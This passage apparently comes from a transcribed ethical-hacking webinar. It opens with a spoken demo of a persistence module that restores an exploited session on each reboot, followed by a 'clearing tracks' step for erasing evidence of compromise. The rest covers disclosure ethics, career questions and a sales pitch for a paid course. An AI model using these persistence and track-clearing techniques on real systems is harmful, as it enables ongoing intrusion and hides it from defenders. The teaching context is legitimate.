percentage temp in this case. All right, and then we will give the final command. Just give me a second here. Percentage temp. Okay. After this command is run, we want to give the final command, that is run. Okay. Now, once you do that, you will be able to exploit, and um it will create the session every time the what do you say the user tries to switch on their PC, because what it's going to do is it's going to enable this persistence module, so it will have a background task running. All right, and when as long as that background task is running, whenever the user reboots on startup, that task will execute and it will continue the exploited session, so the attacker can have continuous access. Okay, and then finally comes, after the exploitation phase, comes the clearing tracks phase, where you can use various tools like your internal tools. In Kali Linux, you will use a command called clear rev to clear to wait, hold on, I have clear rev. Okay, hold on, sudo su. Okay, and here we'll use the clearf command. I think I'm still facing some issue. Wait, hold on. Okay, so anyways, I'm not able to execute this command due to some issues. However, this is the command that you will use to clear out your tracks, okay, your network related information and other uh, basically your evidence of compromise. And then on Windows, you can use various different tools that are available. For example, CCleaner, okay, or Bleach Bit that was discussed earlier. Okay, so yeah, that was very what do you say, um, broad practical for your gaining access and maintaining access phase. Okay, so now we'll talk about what makes our hacking ethical. Okay, first up, we need to disclose any vulnerabilities that we discover responsibly. And we need to first disclose it to the target before disclosing it to the public. Then we need to fuzz ethically using non-malicious payloads and exploits. All right, so that there is no compromise in the confidentiality, integrity, and availability of the target systems and the data. You need to follow the program rules and the scope, which basically means that every company or organization will have some assets that you are not allowed to test on and some assets that they want you to test on. So you need to work according to that. And then you need to provide detailed reports with your proof of concept and your remediation measures. So yeah, that brings us to the end of the stages of ethical hacking. And now we will move on to the Q&A section, that is the question and answer section. All right. So yeah, first off, I want to uh, answer a few of the different questions that are posted here in the link that we have shared. All right. So I have received a few different questions. Let me go through them. First off is is it necessary to pursue a master's degree in cybersecurity or a related field to get hired for senior level job roles in cybersecurity? So, for this, yes, definitely a master's degree will be very useful for you. If not a master's degree, you will need to have equivalent experience, or if not equivalent experience, then you will need to have certifications in the field. All right. So yeah, those are a few of the things that you need to take care of. Now, another question was asked here. Can individuals without coding experience successfully pursue a cybersecurity course and find employment in the field? So here, I would like to say that even though thorough coding experience is not necessary, you have to be familiar with at least one to two programming languages. Okay, this is in order to understand how programming languages are structured. Okay, how variables are declared, how operations are carried out, what is the logic, how the program uses logic in order to calculate output. So in order to understand these things, you do need to have some minimum exposure to any programming language. All right. Then we have another doubt here, that is cryptography and ethical hacking and cybersecurity related to each other? Yes, definitely. Cryptography is a part of cybersecurity, a very important part. It involves encryption and decryption of data. So even from a perspective of offensive security, you will need to decrypt data, and from the part of defensive security, you will need to keep your data securely encrypted. All right, so that is definitely related to each other. And then yeah, someone has asked, as a job perspective, is CEH required? So yeah, definitely from your job perspective, CH or any other entry level certification will be useful for you to get a head start in your career. All right. You can choose from various different certifying authorities that are present. All right. And yeah, that's my answer to that. Now, someone has asked whether we provide placement support. Yes, we do have an internship program in which we provide placement support. And yeah, someone has asked a question. Just give me a minute here. Yeah, can individuals, yeah, I think I've already answered that question about individuals without any coding experience. So yeah, basically, and then we have a few more questions regarding the doubts on what are the entry level certifications. So there are various different entry level certifications. There is your CompTIA Security Plus, your CEH, you have your offensive security certified professional, that is your OSCP exam. Okay, and then you have CREST certifications. Various different certifications are available in order to progress. Okay, and then besides that, people have asked what is uh, the what are the various different jobs. Okay, some people have asked what is the minimum range for the package, and how many uh, important things must be known to excel in ethical hacking. So allow me to cover all of these doubts together. So let us proceed. Um, Over here, you can see a map in this diagram. You can see the various different career pathways that you have in cybersecurity. First up, in security engineering, you have various different roles that you can assume, like application security, DevOps, cloud security, okay, security automation. Then under security operations, you have SOC, okay, that includes your threat management and security incident and response, threat hunting, forensics, malware analysis. Then under threat management, we have vulnerability management, pen testing, red team. Finally, under security research, we have exploit development, okay, which is the advanced version where you have to develop exploits and publish them for various different products. Then we have security assurance, that is your governance, risk, and compliance related part. Okay, and then we have the management, the senior management related, that is your CISO. Now, if you are planning on, starting out on your career, you can, these are the feeder roles. So basically, you need to either have your education or a proven ability, which means you need to have a proven practical threat research portfolio. Okay, then or you need to be from an IT or tech background, or you need to be from an IT and networking background. If you are from a financial or risk background or security intelligence or management background, or you are from the coding background, then you can join in the cybersecurity field. Okay, then the next stage of roles that come at a higher level are your vulnerability tester, your cybersecurity analyst, security auditor, SOC analyst, your penetration tester roles. Okay, then at a higher advanced stage, we have your advanced generalists. These are people who are your general cybersecurity seniors. Okay, and or you can choose to proceed to a cybersecurity specialist role where you will specialize in, for example, cloud security or network security or DevSecOps, that is threat modeling of code. All right, and then yeah, you will also have your cloud security architect role. Okay, so yeah, at the stage 5, which is the senior most stages, we have our chief privacy officer, okay, your cybersecurity manager, or then you have specialist roles that you can go to. That is your cryptographer or senior malware analyst, senior threat hunter. All right, so these are the various different roles that are available in the cybersecurity field. Now, someone had asked me a doubt about what are the different salaries, what are the scope. As you can see over here, the this statistic was provided from glassdoor.com. Okay, you can see that a security administrator earns around $84,997. That is around 71 lakhs. Okay, 71 lakhs, and then security architect earns $156,191. That is around 1.3 crores. So there is definitely scope. Okay, there is definitely uh, the potential to earn well. Okay, but you also need to put in your hard work. Okay, now someone has asked about if it is possible to move to cybersecurity domain if we are working in a non-tech role, like switching the career. So in this case, you can switch to the cybersecurity role, but you will need to get a firm grip of your fundamentals. So there are various fundamental things that you need to learn in order to, sustain in a cybersecurity role. It can include your computer hardware fundamentals, your operating system fundamentals, your network fundamentals. All right. So all of these things have various subcategories and they are huge topics. Okay. They include various things like life of a packet. Okay. Your routing and configuration things. Okay. Your IP addressing, the OSI stack. All of these things you need to be familiar with your communication standards and protocols. Okay. So there are various different things. Yeah, then those are the things that you need to take care of. If you are interested in to learn about cybersecurity, we do have an internship and training program that you can visit using these URLs displayed here so that you can, see the details about our internship. Okay, we also have a cybersecurity training and internship program called Cyber Fusion. All right. So this is a very comprehensive program that includes the three different modules. One is the basics module, okay, where we will cover various basics of cybersecurity. Then we have the advanced module where we will cover advanced concepts in the cybersecurity field from various different disciplines. And then we also have a specialization module where you can choose what kind of thing you want to specialize in under cybersecurity field. Okay, so there are many benefits to our cybersecurity internship program. The first is you will always have hands-on training and internship with practical for each and every concept so that you can develop your professional practical portfolio. Okay, you will have placement support that will be given by us once you have developed and matured. And we also provide personal development, the behavior that is expected from security personnel that is what we will help you to inculcate. Then you will also have working professionals as mentors for your guidance. They will be available to help you in case you get stuck anywhere or in case you have any doubts or if you are testing on a target and you need some help. The mentors will be available to guide you. This program has flexible timing and schedule, so it is actually suitable for working professionals as well who have very hectic schedules. Okay, then we also give lifelong access to resource material that will be provided. Okay, another thing that I have not mentioned that is we will also be providing live targets for people or for interns to work on or trainees to work on and provide reports on vulnerabilities that they have spotted. So that was about our cyber fusion uh, training and internship program. If you are interested, then you can feel free to visit the website. We will also, with your practical professional portfolio, we will also help you grow your professional network so that it will be easier for you to find jobs in the field. So yeah, uh, that brings
Ali,
us. Yes,
Saurabh this side, yeah.
yeah. Tell
Yeah.
me, Saurabh.
So just wanted to point out few things. Just give me
Yeah,
5 minutes. I'll just take 5 minutes of your time. So,
sure.
guys, I just wanted to mention a special offer that is going on right now. Okay. So we have three courses actually. Okay. First is the Cyber Fusion, as mentioned by our speaker, Ali, Cyber Fusion. Then we have another two courses That is the certified ethical hackers course, and one we have is bug hunting training program. Okay, so see, it's a special offer only for the attendees of this webinar, that we are offering you guys a chance to grab the other two courses worth 20,000 completely for free if you apply before 19th of July. Okay, so the course, like the ethical hacking course, is worth 5,000, and the bug hunting essentials program is worth 15,000, which will be offered free of cost to you guys if you enroll for the main cyber fusion training program, as explained by our speaker Ali. You saw, like, we have tried our best to give out the best curriculum and the best possible knowledge. Okay, and surprise, Ali will like, if you are lucky, Ali can be your mentor for the batch. Okay, so you already saw how well he is able to explain and like break down the difficult theories in easy way. Okay, so I'll just drop a Google form link, which you guys can fill and apply for that offer. Okay, please note, like, it is only valid till 19th of July till 6 p.m. After that, we will be not entertaining any of the inquiries that will be getting. So I'm just sharing the form. Just fill it out, and will our course advisors will be connecting with you to discuss this further. Okay. Thanks, Ali. That's it.
Yeah. Yeah. So I think we are coming to the end of uh, you know our program. I have one doubt from a person here. They say that they want to do a master's in USA in 2025 in the cybersecurity stream, and they want to know if the cybersecurity training program will be helpful for them. So for that, I would like to say, Kishore, that this training program will definitely help you gain an advantage. Okay, if you are going to complete this training program before your masters itself, then I think you will have a even higher advantage as compared to your peers, because you will also have your network growing. You will also have your practical portfolio, your threat research portfolio ready by the time the internship is over. You will also be experienced with various different vulnerabilities, and you will also be experienced by working on live client targets that we give to our interns. Okay, so you will have the ability, you will have the what do you say, the opportunity, I should say, to carry out VAPT assessments on assigned client targets. So yeah, definitely, if you would like to join this training program before you continue your masters in USA in 2025, then yeah, definitely reach out to you can visit our website at the link that I have previously provided, and you can sign up, or you can reach out to us on the details that are provided on our website. So yeah, I think that will bring us to the conclusion of today's webinar. I would like to thank everyone for their patience and understanding. And I would also like to thank the team for giving me this opportunity to conduct this webinar. Yeah, that will bring us to the end of our session. So yeah,
Thanks a lot, Ali.
yeah,
That was
thank
a
you.
wonderful webinar and quite information packed. I hope everyone was able to, like, get as much knowledge as possible. And guys, if you want to have such webinars like in future also, please be in that WhatsApp group, because we are planning some more great webinars. Like last month itself, we had done a webinar on cybersecurity that also went very good. And now this month we planned for this webinar, and as you can see, you guys all are already in this webinar. I and From our end, it looks very information packed, but you guys are the judges here. So and tomorrow itself, and if possible, I will share a feedback form. It's form also in the group. So we request you guys to submit that feedback form also, so that we can get as much feedback from you guys. And on what all aspects we can improve. So consider that form as a review form also. If you can post a good real reviews, like how you found this webinar helpful, or some critiques if you have, you can post, be real with that feedback form, and we will take everything into our account, and the good reviews will be posting on our social media handles also. So yeah, thanks a lot, Ali. Thanks a lot, guys. Thanks a lot for being such a good attendees. Okay, we'll see you in
Thank
the
you.
next
Thank you.
webinar. Yeah, thank you. And
Really,
yes,
really
guys,
nice work, Ali.
yeah.
Thank you.
Yeah,
Thank you.
so guys, just a last thing, the offer, talking about the offer, it's only valid till 19th of July. If you guys want to join, please join, and be in that WhatsApp group. Okay, we'll see you guys. Okay, thanks a lot, guys. Thanks, Ali. Thanks, everyone.
Cheers, Ali. Nice work.